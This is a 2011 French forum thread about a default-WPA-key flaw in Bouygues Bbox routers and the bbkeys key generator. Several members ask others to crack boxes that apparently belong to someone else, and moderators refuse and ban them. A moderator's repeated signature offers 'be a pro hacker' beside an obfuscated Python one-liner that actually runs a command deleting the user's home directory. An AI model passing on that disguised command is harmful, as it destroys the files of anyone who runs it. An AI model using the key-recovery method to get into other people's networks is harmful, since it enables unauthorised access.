Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#251 27-09-2011 18:31:39

M1ck3y
Administrateur
Lieu : Lost in the darkness

Re : Faille Bbox WPA (Bouygues Telecom): générateur Bbkeys (exclu: 0day)

En fait, le problème c'est qu'il est sur un réseau ou 200 autres étudiants sont connectés et utilisent la meme IP. Sachant que les étudiants téléchargent à tout va et que MU n'autorise pas les téléchargements parallèles le seul créneau ou il lui est possible de télécharger quelque chose sur MU c'est les nuits de pleine lune entre 3h40 et 3h50 du mat...

Je te l'ai uploadé ailleurs si ça peut t'aider spawn, une backup reste sur le site mais elle est redirigée, je préfère éviter les téléchargements directs depuis le site. Voici le lien: Pack newbbkeys.

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#252 28-09-2011 21:25:11

spawn
Modérateur

Merci beaucoup, je l'ai !
Je vais regarder ce qu'il y a dedans avec beaucoup d'intérêt.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#253 01-10-2011 22:21:59

VIENTxMExPOMMER
Banni(e)

Bonjour a tous es que quelqun peut decrtpter ceci Bbox-95E942
Je n'y arrive pas avec bbkey
Cela serait très aimable de votre part messieurs dames
(un peut de lèche ne fait de mal a personne) wink
Merci

#254 01-10-2011 23:57:03

koala
Membre d'honneur
Lieu : In the sky

[Bonjour a tous es que quelqun peut decrtpter ceci Bbox-95E942
(un peut de lèche ne fait de mal a personne)
Merci

Ici on aide pas a pirater et j'aime encore moins la lèche et toi tu dois pas etre chez free, ta pas vraiment compris ce qu'on faisait sur ce forum big_smile

#255 02-10-2011 00:18:00

VIENTxMExPOMMER
Banni(e)

koala a écrit :

[Bonjour a tous es que quelqun peut decrtpter ceci Bbox-95E942
(un peut de lèche ne fait de mal a personne)
Merci

Ici on aide pas a pirater et j'aime encore moins la lèche et toi tu dois pas etre chez free, ta pas vraiment compris ce qu'on faisait sur ce forum big_smile

Autant d'hypocrisie dans une seul phrase c'est rare !

"Entre parenthèse je vois pas le rapport avec free parce que je suis sous orange"

Pour conclure définitivement cette conversation sans issue. Je dirais que si c'est comme ça que vous acceuilez vos nouveau membres qui font une erreur d'interprétation ""sur la fonction ambiguë de ce site web"" je vous dis merci et au revoir

#256 02-10-2011 00:22:34

koala
Membre d'honneur

On accueille les membres qui veulent apprendre (pas ceux qui souhaitent qu'on leur fasse le travail a leurs place) de plus si tu es chez orange a qui est cette box?

"Entre parenthèse je vois pas le rapport avec free parce que je suis sous orange"

La pub de free c'est ...

#257 02-10-2011 11:01:26

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Pour conclure définitivement cette conversation sans issue. Je dirais que si c'est comme ça que vous acceuilez vos nouveau membres qui font une erreur d'interprétation ""sur la fonction ambiguë de ce site web"" je vous dis merci et au revoir

Perso je ne trouve pas que l'accueil soit si mauvais que ça pour quelqu'un qui débarque avec un pesudo entièrement en majuscule qui fait un peu (Salut, bougez d'la c'est moi j'arrive).
Surtou quand on voit que tu n'as pas jeté un oeil sur le règlement.

Section 3 très claire :

3/ La distinction entre les passionnés de sécurité réseau et les script kiddies qui veulent cracker la clé WEP de leur voisin: rien d'illégal chez nous, que des passionnés de sécurité

Section 6 très claire :

6/ Un problème => Un topic

Peut être même un brin de section 10 "pollution de topic".

Et tout cela sans t'être présenté.

Bref estimes toi plutôt chanceux de pas avoir été ban direct.

Il n'y a que pour toi que la fonction du site est ambigue.

je vous dis merci et au revoir

Je dirais au vu de ta réaction que ce n'est pas plus mal, appremment tu t'es trompé d'adresse.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#258 02-10-2011 11:10:49

VIENTxMExPOMMER
Banni(e)

noireaude a écrit :

Perso je ne trouve pas que l'accueil soit si mauvais que ça pour quelqu'un qui débarque avec un pesudo entièrement en majuscule qui fait un peu (Salut, bougez d'la c'est moi j'arrive).
Surtou quand on voit que tu n'as pas jeté un oeil sur le règlement.

Section 3 très claire :

3/ La distinction entre les passionnés de sécurité réseau et les script kiddies qui veulent cracker la clé WEP de leur voisin: rien d'illégal chez nous, que des passionnés de sécurité

Section 6 très claire :

6/ Un problème => Un topic

Peut être même un brin de section 10 "pollution de topic".

Et tout cela sans t'être présenté.

Bref estimes toi plutôt chanceux de pas avoir été ban direct.

Il n'y a que pour toi que la fonction du site est ambigue.

je vous dis merci et au revoir

Je dirais au vu de ta réaction que ce n'est pas plus mal, appremment tu t'es trompé d'adresse.

Merci pour cette menace de ban complètement inutile et sans reel poids de pression car je me désabonne de cette discussion  Et me déinscrit du site   
Donne continuation a vous

#259 02-10-2011 11:13:46

yasmine
Membre Indispensable

VIENTxMExPOMMER a écrit :

je me désabonne de cette discussion  Et me déinscrit du site   

Il va se "pommer" tout seul !!

Aie Aie

#260 02-10-2011 11:14:47

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Merci pour cette menace de ban complètement inutile et sans reel poids de pression car je me désabonne de cette discussion  Et me déinscrit du site   

Ma remarque visait à être constructive, ce n'était pas une menace de ban (sinon ça serait déjà fait).
Mais bon je vois que tu fais partie de ceux qui ne veulent voir les choses que de leur point de vue (de victime innocente contre laquelle le monde entier s'est ligué). J'ai horreur de ça.

Alors ne te donnes pas tant de peine, vais te filer un coup de main on ne va pas polluer le topic plus longtemps avec des discussions à la con et stériles.

Allez hop !!! A la rue !!!

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#261 27-10-2011 20:48:14

Psicho_20
Banni(e)

M1ck3y... Bonjour, tout d'abord merci pour l'info... par contre je essaye le Bbkeys programme et, je n'arrive pas... Mon Bbox c'est 19DFEA... ca serrait tres cool.. merci d'avance

#262 27-10-2011 20:53:19

Polo38
Membre Radioactif

Psicho_20 a écrit :

M1ck3y... Bonjour, tout d'abord merci pour l'info... par contre je essaye le Bbkeys programme et, je n'arrive pas... Mon Bbox c'est 19DFEA... ca serrait tres cool.. merci d'avance

C'est bien un cryptage WPA ?

#263 28-10-2011 10:41:52

Psicho_20
Banni(e)

oui...

#264 28-10-2011 12:25:26

koala
Membre d'honneur

Psicho_20 ici on veut bien t'aider mais les message du genre "j'y arrive pas" sans rien dire de plus sur la démarche que tu fais ça donne pas envie de répondre, autre chose, penses a aller te présenter, c'est mieux quand on arrive quelque part.

Cordialement wink

#265 30-10-2011 00:22:22

Psicho_20
Banni(e)

mes excuses... je telecharge le programme et il ne s'execute pas. soit il marche pas soit je pris en fait un virus cache. dans les 2 cas, je pas reusi le faire marche et faire passer par le command prompt pour avoir le mdp sur le Bbox donc, je me suis dis de demander a quelq'un d'autre s'il pouvait le faire chez lui et de poster le mdp. le type de sécurité c  wpa2-psk. merci d'avance

#266 30-10-2011 01:24:37

goliate
Membre Irremplaçable
Site Web

Psicho_20 a écrit :

mes excuses... je telecharge le programme et il ne s'execute pas. soit il marche pas soit je pris en fait un virus cache. dans les 2 cas, je pas reusi le faire marche et faire passer par le command prompt pour avoir le mdp sur le Bbox donc, je me suis dis de demander a quelq'un d'autre s'il pouvait le faire chez lui et de poster le mdp. le type de sécurité c  wpa2-psk. merci d'avance

Alors toi ta tout compris a la vie du forum, en 1 Post tu viol le reglement.
-1° Je ne voit pas pourquoi M1ck3y nous aurais donner un sois-disant virus, (tu ne c'est pas le faire fonctionner c'est une chose, mais d'accuser notre admin de piéger les visiteur du forum tu vas loin, et frôle a mon avis la sanction.)

-2°Dans ta phrase

Psicho_20 a écrit :

je me suis dis de demander a quelq'un d'autre s'il pouvait le faire chez lui et de poster le mdp. le type de sécurité c  wpa2-psk. merci d'avance

Alors là , tu viol franchement le règlement en demander a d'autres membres de pirater ton voisin , et encore une foit tu risque une sanction.

Dans tout les cas si tu ne c'est pas le faire fonctionner go apprendre --->a te servir des commande<---

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#267 30-10-2011 01:33:51

Psicho_20
Banni(e)

je n'accuse personne de rien... c pas ca faute que je telecharge le programme sur un site bidon sur internet.. pour le fait de le poster.. pas grave.. ils peuvent m'envoie un mail et il n'y aura rien poste sur votre forum mais, mieux que ca, je vais trouve un autre facon d'avoir son mdp ou, le plus facile et plus corect, je vais aller chez lui et le demander... desole pour vous avoir cause des problemes

#268 30-10-2011 02:36:20

goliate
Membre Irremplaçable
Site Web

Psicho_20 a écrit :

je n'accuse personne de rien... c pas ca faute que je telecharge le programme sur un site bidon sur internet.. pour le fait de le poster.. pas grave.. ils peuvent m'envoie un mail et il n'y aura rien poste sur votre forum mais, mieux que ca, je vais trouve un autre facon d'avoir son mdp ou, le plus facile et plus corect, je vais aller chez lui et le demander... desole pour vous avoir cause des problemes

Sa ne ma pas pose de problèmes a proprement parler, mais lit ---> la section 3 du règlement <---

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#269 30-10-2011 04:51:03

koala
Membre d'honneur

mes excuses... je telecharge le programme et il ne s'execute pas. soit il marche pas soit je pris en fait un virus cache.

Tu accuses a tord comme ça toi?
Ps: fais gaffe on s'amuse tous a s'envoyer des méga giga virus ici lol

ils peuvent m'envoie un mail et il n'y aura rien poste sur votre forum mais, mieux que ca, je vais trouve un autre facon d'avoir son mdp ou, le plus facile et plus corect, je vais aller chez lui et le demander... desole pour vous avoir cause des problemes

Tiens bizarre, je croyais que c'était ta Bbox?

Tu es grillé, reviens quand tu auras de meilleurs intentions.

#270 02-11-2011 13:06:48

alladin
Nouveau membre

Bonjour j'ai testé Bbkey sur une Bbox récente, et la clé n'est pas trouvé. J'ai lu que les nouvelles Bbox n'avaient plus cette faille mais j'aimerais une confirmation. Est-il possible de trouvé la clé WPA des nouvelles Bbox avec Bbkey ? Merci

#271 02-11-2011 14:21:52

spawn
Modérateur

La faille a été corrigée pour les nouvelles Bbox.
C'est donc normal que ta clef ne soit pas trouvée.
À la page 10 de ce topic, tu trouveras les sources d'une nouvelle version de bbkeys, qui *apparemment* fonctionnerait pour els nouvelles.

Je n'ai pas trouvé de différences algorithmiques entre les deux versions, donc je ne pense pas pouvoir plus t'aider.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#272 02-11-2011 18:00:01

alladin
Nouveau membre

Merci spawn j'ai testé la nouvelle version.
Je trouve grace à cela 2 clé potentiel mais pas les bonnes malheuresement.

Auriez vous une idée d'ou cela peut provenir ?
Merci

#273 02-11-2011 19:03:50

spawn
Modérateur

C'est que le tu as changé le mot de passe de ta box qui n'est plus celui par défaut.
Tu le sais bien car c'est TA box.
Tu peux poster ici le serial number, l'ESSID et la clef par défaut de ta box ? ( histoire de faire 3-4 recherches comme on l'a déja fait pour les livebox. )

Et évite le cross-posting, c'est plutôt mal vu.

@9b0ae3c4 méric.fr

#274 02-11-2011 19:19:30

Polo38
Membre Radioactif

Une petite question : le cryptage par défaut des BBox est maintenant le WPA2 ou les possesseurs de BBox sont bien plus vigilants que les autres ?:)

#275 02-11-2011 19:22:46

spawn
Modérateur

L'un n'empêche pas l'autre.

Ce qui flanche dans les Bbox, c'est la génération du mot de passe Wifi (WEP ou WPA, indifféremment) qui ne dépend que de l'adresse MAC, et du numéro de série.

Comme il y a un nombre fini de numéros de série (on connaît plus ou moins leur structure), on peut retrouver plusieurs clefs potentielles par défaut.

@9b0ae3c4 méric.fr

Annonce